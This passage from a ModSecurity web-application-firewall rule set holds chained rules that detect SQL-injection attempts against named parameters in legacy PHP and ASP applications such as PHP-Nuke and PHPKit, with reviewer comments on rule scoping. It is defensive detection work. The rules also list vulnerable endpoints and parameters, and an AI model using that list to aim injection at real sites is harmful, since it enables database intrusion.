ADMIN_USER UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23854'" SecRule &TX:'/SQL_INJECTION.*ARGS:ADMIN_USER/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpHoo3 SQL Injection Attempt -- admin.php ADMIN_USER UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003816) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpHoo3 SQL Injection Attempt -- admin.php ADMIN_PASS UPDATE SecRule REQUEST_LINE "@contains /admin.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003816,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpHoo3 SQL Injection Attempt -- admin.php ADMIN_PASS UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23854'" SecRule &TX:'/SQL_INJECTION.*ARGS:ADMIN_PASS/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpHoo3 SQL Injection Attempt -- admin.php ADMIN_PASS UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004700) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPKit SQL Injection Attempt -- include.php catid UPDATE SecRule REQUEST_LINE "@contains /include.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004700,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHPKit SQL Injection Attempt -- include.php catid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21002'" SecRule &TX:'/SQL_INJECTION.*ARGS:catid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPKit SQL Injection Attempt -- include.php catid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005789) SpiderLabs 
Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPKIT SQL Injection Attempt -- comment.php subid UPDATE
# Two-rule chain in phase 2: the request line contains /comment.php AND at least
# one TX variable exists whose name matches /SQL_INJECTION.*ARGS:subid/. The
# second rule only counts TX entries, so it presumably relies on earlier
# SQL-injection rules having recorded a hit for that argument. Verify load order.
SecRule REQUEST_LINE "@contains /comment.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005789,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHPKIT SQL Injection Attempt -- comment.php subid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21962'"
SecRule &TX:'/SQL_INJECTION.*ARGS:subid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPKIT SQL Injection Attempt -- comment.php subid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"
# (2005181) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPWind SQL Injection Attempt -- admin.php UPDATE
# This chain does not use the TX lookup: after the request line matches
# /admin.php, the second rule applies (?i:UPDATE.+SET) directly to the query
# string or request body.
# NOTE(review): both conditions are generic (any request line containing
# /admin.php, any text with "update" followed later by "set"), so administrative
# forms unrelated to PHPWind can be scored as critical. Tune or scope this rule
# before enforcing.
# NOTE(review): the chained rule lists no t: actions of its own; confirm which
# transformations are applied to QUERY_STRING|REQUEST_BODY here.
SecRule REQUEST_LINE "@contains /admin.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005181,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHPWind SQL Injection Attempt -- admin.php UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2759'"
SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPWind SQL Injection Attempt -- admin.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"
# (2004330) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- mainfile.php lang UPDATE
SecRule REQUEST_LINE "@contains /mainfile.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004330,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- mainfile.php lang UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22909'"
SecRule 
&TX:'/SQL_INJECTION.*ARGS:lang/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- mainfile.php lang UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004856) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- modules.php category_id UPDATE SecRule REQUEST_LINE "@contains /modules.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004856,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- modules.php category_id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3334'" SecRule &TX:'/SQL_INJECTION.*ARGS:category_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- modules.php category_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005461) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- modules.php active UPDATE SecRule REQUEST_LINE "@contains /admin/modules/modules.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005461,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- modules.php active UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22116'" SecRule &TX:'/SQL_INJECTION.*ARGS:active/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- modules.php active UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005467) SpiderLabs Research (SLR) Public 
Vulns: ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- index.php ad_class UPDATE SecRule REQUEST_LINE "@contains /modules/Advertising/admin/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005467,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- index.php ad_class UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22116'" SecRule &TX:'/SQL_INJECTION.*ARGS:ad_class/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- index.php ad_class UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005473) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- index.php imageurl UPDATE SecRule REQUEST_LINE "@contains /modules/Advertising/admin/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005473,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- index.php imageurl UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22116'" SecRule &TX:'/SQL_INJECTION.*ARGS:imageurl/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- index.php imageurl UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005479) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- index.php clickurl UPDATE SecRule REQUEST_LINE "@contains /modules/Advertising/admin/index.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005479,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- index.php clickurl UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22116'" SecRule &TX:'/SQL_INJECTION.*ARGS:clickurl/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- index.php clickurl UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005485) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- index.php ad_code UPDATE SecRule REQUEST_LINE "@contains /modules/Advertising/admin/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005485,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- index.php ad_code UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22116'" SecRule &TX:'/SQL_INJECTION.*ARGS:ad_code/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- index.php ad_code UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005492) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- index.php position UPDATE SecRule REQUEST_LINE "@contains /modules/Advertising/admin/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005492,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- index.php position 
UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22116'" SecRule &TX:'/SQL_INJECTION.*ARGS:position/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- index.php position UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005590) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- block-Old_Articles.php cat UPDATE SecRule REQUEST_LINE "@contains /blocks/block-Old_Articles.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005590,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- block-Old_Articles.php cat UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22037'" SecRule &TX:'/SQL_INJECTION.*ARGS:cat/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- block-Old_Articles.php cat UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006932) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- modules.php cid UPDATE SecRule REQUEST_LINE "@contains /modules.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006932,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- modules.php cid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/437835/100/200/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:cid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- modules.php cid 
UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006938) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- modules.php pid UPDATE SecRule REQUEST_LINE "@contains /modules.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006938,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- modules.php pid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/437835/100/200/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:pid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP-Nuke SQL Injection Attempt -- modules.php pid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007181) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- index.php sid UPDATE SecRule REQUEST_LINE "@contains /modules/News/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007181,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- index.php sid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/452553/100/0/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:sid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Francisco Burzi PHP-Nuke SQL Injection Attempt -- index.php sid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2011137) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP-Nuke viewslink module sid Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains 
/links.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011137,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS PHP-Nuke viewslink module sid Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,39925'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule REQUEST_LINE "@contains op=viewslink&" "chain"
SecRule &TX:'/SQL_INJECTION.*ARGS:sid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP-Nuke viewslink module sid Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"
# (2011172) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP-Nuke FriendSend module sid Parameter UPDATE SET SQL Injection Attempt
# Four-rule chain in phase 2; all must match: the request line contains
# /friend.php, contains "GET ", contains "op=FriendSend&", and at least one TX
# variable exists whose name matches /SQL_INJECTION.*ARGS:sid/.
# On a match it adds tx.critical_anomaly_score to tx.anomaly_score, sets tx.msg
# and adds part E to the audit log.
# NOTE(review): the method and the op value are matched as literal substrings of
# the request line, which ties the rule to one parameter order and spelling.
# Testing REQUEST_METHOD and ARGS:op would state the same conditions
# independently of layout; confirm the intended scope.
# NOTE(review): msg says "UPDATE SET", but no rule in this chain tests for those
# keywords; the final rule only counts earlier SQL-injection TX entries for sid.
SecRule REQUEST_LINE "@contains /friend.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011172,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS PHP-Nuke FriendSend module sid Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,39992'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule REQUEST_LINE "@contains op=FriendSend&" "chain"
SecRule &TX:'/SQL_INJECTION.*ARGS:sid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP-Nuke FriendSend module sid Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"
# (2005906) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP-Update SQL Injection Attempt -- guestadd.php newmessage UPDATE
SecRule REQUEST_LINE "@contains /code/guestadd.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005906,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHP-Update 
SQL Injection Attempt -- guestadd.php newmessage UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3017'" SecRule &TX:'/SQL_INJECTION.*ARGS:newmessage/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP-Update SQL Injection Attempt -- guestadd.php newmessage UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005912) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP-Update SQL Injection Attempt -- guestadd.php newname UPDATE SecRule REQUEST_LINE "@contains /code/guestadd.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005912,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHP-Update SQL Injection Attempt -- guestadd.php newname UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3017'" SecRule &TX:'/SQL_INJECTION.*ARGS:newname/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP-Update SQL Injection Attempt -- guestadd.php newname UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005918) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP-Update SQL Injection Attempt -- guestadd.php newwebsite UPDATE SecRule REQUEST_LINE "@contains /code/guestadd.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005918,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHP-Update SQL Injection Attempt -- guestadd.php newwebsite UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3017'" SecRule &TX:'/SQL_INJECTION.*ARGS:newwebsite/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP-Update SQL Injection Attempt -- guestadd.php newwebsite 
UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"
# (2005924) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP-Update SQL Injection Attempt -- guestadd.php newemail UPDATE
# Two-rule chain in phase 2: the request line contains /code/guestadd.php AND at
# least one TX variable exists whose name matches
# /SQL_INJECTION.*ARGS:newemail/. The second rule only counts TX entries, so it
# presumably relies on earlier SQL-injection rules having recorded a hit for that
# argument. Verify load order.
SecRule REQUEST_LINE "@contains /code/guestadd.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005924,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHP-Update SQL Injection Attempt -- guestadd.php newemail UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3017'"
SecRule &TX:'/SQL_INJECTION.*ARGS:newemail/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP-Update SQL Injection Attempt -- guestadd.php newemail UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"
# (2004611) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PNphpBB2 SQL Injection Attempt -- index.php c UPDATE
# Same chain shape, scoped to request lines containing /index.php and TX names
# matching ARGS:c.
# NOTE(review): the TX name pattern has no end anchor, so it is satisfied by TX
# entries for any argument whose name starts with "c" (cat, cid, catid,
# category_id and clickurl all appear as parameters elsewhere in this file).
# Combined with the generic /index.php path test, this chain can add a critical
# score to traffic unrelated to PNphpBB2. An end anchor (ARGS:c$) would limit it
# to the parameter named in msg; confirm against how the generic rules name
# their TX entries.
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004611,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PNphpBB2 SQL Injection Attempt -- index.php c UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4026'"
SecRule &TX:'/SQL_INJECTION.*ARGS:c/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PNphpBB2 SQL Injection Attempt -- index.php c UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"
# (2004935) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PSY Auction SQL Injection Attempt -- item.php id UPDATE
SecRule REQUEST_LINE "@contains /item.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004935,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PSY Auction SQL Injection Attempt -- item.php id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/17974'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PSY Auction SQL Injection Attempt -- item.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006735) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PWP Technologies The Classified Ad System SQL Injection Attempt -- default.asp main UPDATE SecRule REQUEST_LINE "@contains /default.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006735,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PWP Technologies The Classified Ad System SQL Injection Attempt -- default.asp main UPDATE',tag:'web-application-attack',tag:'cve,CVE-2006-6349'" SecRule &TX:'/SQL_INJECTION.*ARGS:main/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PWP Technologies The Classified Ad System SQL Injection Attempt -- default.asp main UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004264) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Particle Blogger SQL Injection Attempt -- post.php postid UPDATE SecRule REQUEST_LINE "@contains /post.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004264,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Particle Blogger SQL Injection Attempt -- post.php postid UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3500'" SecRule &TX:'/SQL_INJECTION.*ARGS:postid/' "@gt 0" 
"ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Particle Blogger SQL Injection Attempt -- post.php postid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005221) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Particle Blogger SQL Injection Attempt -- archives.php month UPDATE SecRule REQUEST_LINE "@contains /archives.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005221,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Particle Blogger SQL Injection Attempt -- archives.php month UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/469984/100/0/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:month/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Particle Blogger SQL Injection Attempt -- archives.php month UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004623) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Particle Soft Particle Gallery SQL Injection Attempt -- viewimage.php editcomment UPDATE SecRule REQUEST_LINE "@contains /viewimage.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004623,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Particle Soft Particle Gallery SQL Injection Attempt -- viewimage.php editcomment UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4019'" SecRule &TX:'/SQL_INJECTION.*ARGS:editcomment/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Particle Soft Particle Gallery SQL Injection Attempt -- viewimage.php editcomment UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004094) 
